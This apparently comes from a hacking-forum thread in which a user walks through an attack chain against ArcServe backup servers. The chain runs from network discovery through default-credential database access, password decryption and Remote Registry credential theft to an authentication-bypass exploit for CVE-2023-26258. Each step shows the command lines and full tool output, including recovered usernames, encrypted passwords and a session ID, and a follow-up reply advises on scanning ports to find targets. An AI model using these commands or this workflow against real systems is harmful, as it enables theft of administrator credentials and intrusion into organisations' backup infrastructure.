Local CVE-2023-26258

[Zodiac]

If you are in the network you can scan for instances configured by default using ArcServeRadar.py. I tried to port it to C# but couldn't, feel free to do it if you know how

c:\Users\vagrant\Desktop>python ArcServeRadar.py "Ethernet 2" 6969 192.168.56.20

                -=[ ArcServe Finder - @TheXC3LL  - MDSec ]=-

[*] Starting to monitor

[*] Broadcasting

WARNING: Mac address to reach destination not found. Using broadcast.

        [+] 192.168.56.10 => ServerName;KINGSLANDING;InstanceName;ARCSERVE_APP;IsClustered;No;Version;15.0.2000.5;tcp;62197;;

If it is configured by default you can use default DB creds to connect to the IP and port obtained before and read the username/password plus where the ArcServe instances are located using ArcServe-dbpwner.py:

psyconauta@insulanova:/tmp|⇒  python3 arcserve-dbpwn.py -target 192.168.56.10 -port 62197
        -=[ ArcServe credential retriever (from DB) - Juan Manuel Fernandez (@TheXC3LL)  - MDSec]=-


[*] Connecting to the server
[*] Login with default creds
[*] Extracting credentials:
    [+] User: SEVENKINGDOMS\vagrant
    [+] Password: {133, 60, 97, 192, 158, 159, 25, 141, 58, 250, 174, 169, 141, 216, 104, 98}; // Paste it to the decrypter
    [+] User: SEVENKINGDOMS\vagrant
    [+] Password: {133, 60, 97, 192, 158, 159, 25, 141, 58, 250, 174, 169, 141, 216, 104, 98}; // Paste it to the decrypter
[*] Finding hosts:
    [+] 192.168.56.10 | kingslanding.sevenkingdoms.local | Windows Server 2019 Datacenter Evaluation
    [+] 192.168.56.10 | kingslanding.sevenkingdoms.local | NULL


 Have a nice day! ^_^

All the passwords retrieved by the tools can be decrypted using ArcServeDecrypter.exe. Just edit the C code to add the array, compile and execute it:

C:\Users\vagrant>C:\Users\vagrant\source\repos\ArcServeDecrypter\x64\Debug\ArcServeDecrypter.exe
                -={ ArcServe Decryptor by Juan Manuel Fernandez (@TheXC3LL) - MDSec}=-

[+] Decrypted string: vagrant

If you have a user with local admin privileges on the server where ArcServe is installed you can read the credentials using Remote Registry service (arcserve-regkeys.py):

psyconauta@insulanova:/tmp|⇒  python3 arcserve-creds.py -u eddard.stark -p 'FightP3aceAndHonor!' -d sevenkingdoms.local -target-ip 192.168.56.20
        -=[ ArcServe Credential Stealer - (@TheXC3LL) - MDSec]=-
[+] Connecting to 192.168.56.20
[+] Checking Remote Registry service status...
[+] Service is down!
[+] Starting Remote Registry service...
[+] Connecting to 192.168.56.20
[+] Opening registry key
    [*] User: P3TWLADS11STD\vagrant
    [*] Password: {133, 60, 97, 192, 158, 159, 25, 141, 58, 250, 174, 169, 141, 216, 104, 98}; // Paste it to the decrypter
[+] Stopping Remote Registry Service

Have a nice day! ^_^

Finally, if the ArcServe version was not patched (CVE-2023-26258) you can exploit an authentication bypass in the management web interface and retrieve the admin creds (ArcServe-exploit.py):

psyconauta@insulanova:/tmp|⇒  python3 exploit.py 192.168.56.10
        -=[ ArcServe Pwner by Juan Manuel Fernandez (@TheXC3LL) - MDSec]=-


[*] Triggering info leak
    [+] AdminName: SEVENKINGDOMS\vagrant
    [+] AuthUUID: 6bf37b8e-ac4f-487d-8d74-d6d0a8d9b8d1
[*] Getting a valid session
    [+] Session: AGENTJSESSIONID=CA35EF18A4FF2F85E25538F60C3F7428
[*] Doing an authenticated request to validate if session is valid
[*] Session is valid
    [+] Admin: SEVENKINGDOMS\vagrant
    [+] Password: {133, 60, 97, 192, 158, 159, 25, 141, 58, 250, 174, 169, 141, 216, 104, 98} // Paste it to the decrypter


Have a happy hacking! ^_^

So here ends the summary of tools that you can find here.


URL - https://github.com/mdsecactivebreach/CVE-2023-26258-ArcServe

even nighthawks talk about it - https://www.mdsec.co.uk/2023/06/cve-2023-26258-remote-code-execution-in-arcserve-udp-backup/

 

[Super Crypt]

how to scan for it in network? for what port?

 

[Zodiac]

how to scan for it in network? for what port?

psyconauta@insulanova:/tmp|⇒ python3 arcserve-dbpwn.py -target 192.168.56.10 -port 62197

As you can see in this example they used 62197 port number, but again it can be changed. So we have to perform a good search in the grid to identify it.